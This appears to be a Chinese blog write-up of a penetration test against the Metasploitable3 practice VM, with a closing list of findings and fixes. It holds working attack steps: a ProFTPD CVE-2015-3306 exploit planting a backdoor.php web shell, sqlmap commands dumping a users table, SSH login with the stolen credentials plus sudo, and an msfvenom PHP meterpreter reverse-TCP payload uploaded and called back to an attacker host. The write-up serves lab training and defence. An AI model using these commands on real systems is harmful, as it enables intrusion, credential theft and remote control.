Metasploitable3渗透测试实战

灰太狼 2022-10-30 04:28 311阅读 0赞

这是一个著名的靶场Metasploitable3，关于靶机搭建网上文章非常多，这里我就不再写了，但是关于漏洞挖掘没有什么文章，而且这个靶场windows版本和linux版本还有差别，我这里写一些简单的吧，自己就挖到这个程度了，有不对的地方还请前辈高人指点一二

### 目录 ###

*  1综述
 *  2.渗透过程
 *   *  2.1渗透路径说明
     *  2.1.1全端口扫描/服务发现
     *  2.1.2目录扫描
     *  2.1.3一、ProFTPD 1.3.5命令读取和写入任意文件。
     *  2.1.4二、sql注入
     *  2.1.5三、phpmyadmin远程php代码执行
     *  2.1.6四、文件上传漏洞
 *  2.2渗透成果说明
 *   *  2.2.1
     *  2.3存在问题
     *  2.4整改建议

# 1综述 #

经过演习指挥部授权，团队于2020年1月14日，对XXXXXX单位进行了渗透评估，通过模拟真实网络攻击行为，评估系统是否存在可以被攻击者利用的漏洞以及由此因此引发的风险大小，为制定相应的安全措施与解决方案提供实际的依据。  
渗透结果总结汇总如下表：  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzA3OTk1OA_size_16_color_FFFFFF_t_70]

# 2.渗透过程 #

## 2.1渗透路径说明 ##

## 2.1.1全端口扫描/服务发现 ##

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzA3OTk1OA_size_16_color_FFFFFF_t_70 1]

## 2.1.2目录扫描 ##

![在这里插入图片描述][2021021714580737.png]

## 2.1.3一、ProFTPD 1.3.5命令读取和写入任意文件。 ##

根据版本可以知道目标网站存在CVE-2015-3306 漏洞  
exp下载地址：https://github.com/t0kx/exploit-CVE-2015-3306  
1.使用git clone https://github.com/t0kx/exploit-CVE-2015-3306将exp下载到本地  
![在这里插入图片描述][20210217145800519.png]

2.执行python3 exploit.py --host 192.168.44.138 --port 21 --path "/var/www/html"运行检测脚本  
![在这里插入图片描述][20210217145756834.png]

访问http://192.168.44.138/backdoor.php？cmd=id

可以看到成功执行了命令  
![在这里插入图片描述][20210217145749495.png]

## 2.1.4二、sql注入 ##

在http://192.168.44.138/payroll\_app.php登录时抓包发送到burp爆破模块  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzA3OTk1OA_size_16_color_FFFFFF_t_70 2]

将用户名设为暴破变量  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzA3OTk1OA_size_16_color_FFFFFF_t_70 3]

可以发现目标网站对payload进行了执行处理，可以推断该处存在sql注入漏洞  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzA3OTk1OA_size_16_color_FFFFFF_t_70 4]

将数据包存在post.txt文件中，使用sqlmap进行测试  
sqlmap -r post.txt -p “user” -dbs 可以得到数据库名称  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzA3OTk1OA_size_16_color_FFFFFF_t_70 5]

3.依次可以得到表和字段名称，最后使用命令  
sqlmap -r post.txt -p “user” -D payroll -T users -C first\_name,last\_name,password --dump  
得到数据库中存储的用户名密码  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzA3OTk1OA_size_16_color_FFFFFF_t_70 6]

## 2.1.5三、phpmyadmin远程php代码执行 ##

1.用数据库中得到的用户名密码 leia\_organa help\_me\_obiwan 登录ssh  
ssh leia\_organa@192.168.4.138  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzA3OTk1OA_size_16_color_FFFFFF_t_70 7]

2.sudo -s 提升到管理员权限  
![在这里插入图片描述][20210217145658481.png]

寻找 payroll相关的源代码文件 find / -name “*payroll*”  
![在这里插入图片描述][20210217145654979.png]

4.查看/var/www/html/payroll\_app.php文件，可以看到数据库账户密码  
![在这里插入图片描述][20210217145646853.png]

5.使用账户密码可以进入phpMyAdmin后台，查看版本  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzA3OTk1OA_size_16_color_FFFFFF_t_70 8]

6.在MSF中依次执行  
search phpmyadmin 3.5.8  
use multi/http/phpmyadmin\_preg\_replace  
set password sploitme  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzA3OTk1OA_size_16_color_FFFFFF_t_70 9]

成功连接到目标服务器

## 2.1.6四、文件上传漏洞 ##

1.针对目录扫描出来的路http://192.168.44.138:80/uploads/  
利用msf中的工具进行上传生成payload （默认路径是在home下）  
msfvenom -p php/meterpreter\_reverse\_tcp LHOST=192.168.44.149 LPORT=6666 -f raw >demon.php  
![在这里插入图片描述][20210217145623964.png]

2.上传payload  
davtest -url http://192.168.44.138:80/uploads/ -uploadfile demon.php -uploadloc DavTestDir\_F7umGStRba9ZCw/6666.php  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzA3OTk1OA_size_16_color_FFFFFF_t_70 10]

3.使用侦听模块  
use exploit/multi/handler  
set payload php/meterpreter\_reverse\_tcp  
set LHOST 192.168.44.149  
set LPORT 6666  
![在这里插入图片描述][20210217145607504.png]

成功连接目标服务器

# 2.2渗透成果说明 #

## 2.2.1 ##

![在这里插入图片描述][20210217150010184.png]

## 2.3存在问题 ##

1.ProFTPD中使用的mod\_copy模块存在未授权访问风险，导致ProFTPD自带的命令 SITE CPFR 和 SITE CPTO 可在未登录ftp的情况被外部黑客所利用，对系统文件进行任意复制。  
2.在与数据库交互的地方并未作出安全的过滤，导致参数被数据库当成命令执行，威胁到服务器数据安全。  
3.采用的phpmyadmin组件有版本漏洞，容易被攻击者进行利用。  
4.对文件上传目录并没有进行权限管理，未登录就可以访问该目录，并未对可以上传的内容与用户做出限定，并且该目录有可执行权限。

## 2.4整改建议 ##

1.针对于ProFTPD与phpmyadmin中出现的问题建议将该组件更新为最高版本或到官方网站及时更新补丁。  
2.针对sql注入，建议完善输入检查，采用白名单的方式对输入进行过滤，并将输入内容进行转义，参数化处理。  
3.针对文件上传问题，对url采用防回溯处理，采用open\_basedir限制用户访问范围，对文件上传路径进行访问限制，将上传的文件进行改名，并只给予该文件夹可读取权限。

[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzA3OTk1OA_size_16_color_FFFFFF_t_70]: /images/20221024/0dd7024bd0654ddcae93c5bf303c161a.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzA3OTk1OA_size_16_color_FFFFFF_t_70 1]: /images/20221024/b79a58dc5c26434fa7353e28551811ba.png
[2021021714580737.png]: /images/20221024/86c856daca0f45cf8daa5f518c69ce33.png
[20210217145800519.png]: /images/20221024/502b6566317443ed94ba78e1ef657888.png
[20210217145756834.png]: /images/20221024/25d9d3110a364116825ecc65d8157545.png
[20210217145749495.png]: /images/20221024/613ce1bde1c44019a52f050e85e55969.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzA3OTk1OA_size_16_color_FFFFFF_t_70 2]: /images/20221024/bb6e8d14934f4f399adcbe62f90c8430.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzA3OTk1OA_size_16_color_FFFFFF_t_70 3]: /images/20221024/9c102e08c6dd49eebfb609f93d9f6a94.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzA3OTk1OA_size_16_color_FFFFFF_t_70 4]: /images/20221024/049751e5a7ea4eeb946ca906ced0f9d1.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzA3OTk1OA_size_16_color_FFFFFF_t_70 5]: /images/20221024/57140a220c954e9f96aa749e3ecb44e1.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzA3OTk1OA_size_16_color_FFFFFF_t_70 6]: /images/20221024/b13b7a42a33c4e5fa3760ae0c5ad9d03.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzA3OTk1OA_size_16_color_FFFFFF_t_70 7]: /images/20221024/aa18e4c757bb4e07ad5072dd15eb0aad.png
[20210217145658481.png]: /images/20221024/f62034df848344f0b7a7244913e2f32d.png
[20210217145654979.png]: /images/20221024/ad1ed4d9747f4290a826b58c1f922db1.png
[20210217145646853.png]: /images/20221024/20c982cb20b440fc8ca04e6ddc6ceaee.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzA3OTk1OA_size_16_color_FFFFFF_t_70 8]: /images/20221024/a96ff6ce3c9c49329a22aa4964503eb3.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzA3OTk1OA_size_16_color_FFFFFF_t_70 9]: /images/20221024/29f241f2cea8487d81dfebffc3a8e0fa.png
[20210217145623964.png]: /images/20221024/353fabe6b0a14ed4bd8c2dfcf4f9bbc0.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzA3OTk1OA_size_16_color_FFFFFF_t_70 10]: /images/20221024/e2f671277dfb47ffaa58ebdd71121fdb.png
[20210217145607504.png]: /images/20221024/1adf41164a1747ea8f3f1ecbfb9c0bf8.png
[20210217150010184.png]: /images/20221024/f4fe4db255c94a088afbb801122c6297.png